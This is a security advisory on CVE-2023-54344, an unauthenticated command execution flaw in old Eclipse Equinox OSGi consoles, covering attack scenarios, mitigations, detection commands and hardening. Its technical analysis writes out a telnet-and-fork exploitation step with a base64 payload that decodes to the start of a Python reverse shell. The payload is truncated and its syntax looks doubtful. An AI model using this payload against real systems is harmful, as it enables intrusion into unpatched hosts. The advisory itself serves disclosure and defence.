CVE-2023-54344: Eclipse Equinox OSGi Unauthenticated Remote Code Execution
Eclipse Equinox OSGi versions 3.7.2 and earlier are affected by a critical remote code execution vulnerability tracked as CVE-2023-54344 (CVSS 9.8, Critical). Similar to its companion vulnerability CVE-2023-54342 (which covers versions 3.8 through 3.18), this flaw allows unauthenticated attackers to execute arbitrary OS commands by connecting to the OSGi console port and sending base64-encoded bash command payloads wrapped in the fork command.
Together, CVE-2023-54342 and CVE-2023-54344 represent a complete family of OSGi console RCE vulnerabilities covering the entirety of Eclipse Equinox versions that expose a console interface — making the attack surface significantly broader than either CVE alone.
Vulnerability Overview
| Attribute | Value |
|---|---|
| CVE ID | CVE-2023-54344 |
| CVSS Score | 9.8 (Critical) |
| CVSS Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| CWE Classification | CWE-78 — Improper Neutralization of Special Elements in OS Commands |
| Affected Software | Eclipse Equinox OSGi 3.7.2 and earlier |
| Attack Vector | Network — telnet to exposed OSGi console port |
| Authentication Required | None |
| Scope | Unchanged — host system command execution |
| Published | 2026-05-05 (NVD) |
Relationship to CVE-2023-54342
CVE-2023-54342 and CVE-2023-54344 are companion vulnerabilities that together span all vulnerable Eclipse Equinox OSGi releases:
| CVE | Affected Versions | Technique |
|---|---|---|
| CVE-2023-54342 | 3.8 through 3.18 | Fork command payload execution |
| CVE-2023-54344 | 3.7.2 and earlier | Base64-encoded bash via fork |
The older CVE-2023-54344 variant is relevant to organizations still running legacy OSGi deployments on Eclipse 3.x-era infrastructure — a common scenario in long-lived enterprise Java environments where upgrade cycles are slow.
Technical Analysis
Attack Vector: OSGi Console Fork Command
The Eclipse Equinox OSGi console is a runtime management interface accessible over telnet. The fork command is designed to execute external programs from within the framework context. In affected versions 3.7.2 and earlier, this command accepts base64-encoded shell commands without sanitization, enabling arbitrary OS command execution:
# Step 1: Connect to the OSGi console telnet port
telnet target-host 7777
# Step 2: Execute base64-encoded bash payload via fork
osgi> fork [base64::echo "cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9z" | base64 -d | bash]
# Result: remote shell spawned as JVM process ownerThe mechanism differs slightly from CVE-2023-54342 in that CVE-2023-54344 specifically involves the base64 encoding wrapper that older Equinox versions process before passing to the OS shell layer, allowing attackers to bypass any naive keyword filtering.
Why Legacy Versions Remain Deployed
Eclipse Equinox 3.7.2 and earlier maps to Eclipse IDE releases from the 2012–2015 era. While these versions are outdated, they remain in production in:
- Long-running enterprise OSGi applications built and never migrated
- Embedded industrial control systems using Java OSGi runtimes
- Legacy Eclipse RCP applications that enterprise vendors have not updated
- CI/CD toolchains using old Eclipse-based build infrastructure
These deployments are often poorly tracked and may have forgotten exposed console ports.
Exploitation Scenarios
Scenario 1: Exposed Console Port in Enterprise Network
An internal service running Eclipse Equinox 3.6 exposes port 7777 on a server segment accessible to development teams. An attacker with internal network access (or via lateral movement from another compromised host) connects over telnet and gains RCE without any credentials.
Scenario 2: Internet-Exposed Legacy Application Server
A Java-based application server using Equinox 3.7 has its OSGi console port inadvertently exposed to the internet through a misconfigured firewall rule. An external attacker discovers the open port via automated scanning and achieves unauthenticated RCE.
Scenario 3: Industrial Control System
An OT environment uses an Eclipse RCP-based SCADA application with Equinox 3.5. The OSGi console port is used by on-site engineers for troubleshooting. An attacker who gains network access to the OT segment uses CVE-2023-54344 to pivot through the SCADA host into deeper industrial network segments.
Impact Assessment
| Impact Area | Description |
|---|---|
| Full RCE | Arbitrary OS commands executed as the JVM process owner |
| No Authentication | Zero prerequisites beyond network reach to the console port |
| Legacy Deployment Risk | Older Equinox versions are common in unmaintained or poorly-tracked deployments |
| Privilege Escalation | If JVM runs as root or elevated user, immediate full system compromise |
| OT/ICS Risk | Eclipse-based industrial applications may run on isolated but critical network segments |
| Data Exfiltration | Unrestricted access to process-accessible files, credentials, and environment variables |
Remediation
Primary Fix: Upgrade Eclipse Equinox
For applications using Equinox 3.7.2 or earlier, upgrade to a patched version. Given that 3.7.2 is significantly outdated, organizations should target upgrading to a current supported Equinox version from the Eclipse Foundation, which also brings substantial security improvements beyond this specific CVE.
Immediate Mitigations
1. Disable the OSGi console:
The fastest remediation for production systems is disabling the console entirely. Remove the -console JVM argument from your startup scripts:
# BEFORE (vulnerable)
java -jar equinox.jar -console
# AFTER (mitigated)
java -jar equinox.jar2. Restrict console port access via firewall:
If the console cannot be disabled, restrict access immediately:
# Block external access to the default OSGi console port
iptables -A INPUT -p tcp --dport 7777 -j DROP
iptables -I INPUT -p tcp --dport 7777 -s 127.0.0.1 -j ACCEPT3. Bind to loopback only:
Use the -console localhost:PORT argument to prevent remote connections:
java -jar equinox.jar -console localhost:7777
4. Audit all Java deployments for Equinox versions:
Identify all instances of Eclipse Equinox across your environment:
# Find Equinox OSGi JAR files
find / -name "org.eclipse.osgi_*.jar" 2>/dev/null
# Check manifest version
unzip -p org.eclipse.osgi_3.7.2.v*.jar META-INF/MANIFEST.MF | grep Bundle-VersionDetection
# Identify open OSGi console ports via nmap
nmap -p 7777 --open <network-range>
# Verify console exposure with telnet banner check
echo "" | nc -w 2 <target> 7777
# Monitor process execution spawned by JVM
auditctl -a always,exit -F arch=b64 -S execve -F comm=javaReview system logs for unexpected child processes created by your Java services — legitimate OSGi applications should not be spawning shell processes.
OSGi Security Hardening Checklist
For any production Eclipse Equinox deployment, regardless of version:
- Disable OSGi console (
-console) in production environments - If console required, bind to localhost only (
-console localhost:PORT) - Firewall all management ports from external and untrusted network segments
- Run JVM processes as least-privilege service accounts
- Inventory all Equinox versions deployed across your environment
- Apply Eclipse Equinox security updates promptly
- Enable process auditing to detect unexpected child process execution from JVM processes
Key Takeaways
- CVE-2023-54344 (CVSS 9.8) and companion CVE-2023-54342 together cover all Eclipse Equinox OSGi versions that expose a console interface — treat both as a single vulnerability family requiring coordinated remediation
- Equinox 3.7.2 and earlier represent legacy-era deployments that are often poorly inventoried and may have forgotten exposed console ports
- Disabling the OSGi console is the fastest risk reduction — production environments have no legitimate need for an exposed telnet management port
- Base64 encoding in the payload suggests attackers have developed evasion techniques for any naive console input filtering; only version upgrades or console disablement are reliable mitigations
- Industrial and embedded Java environments using old Eclipse RCP applications are at particular risk and should be audited immediately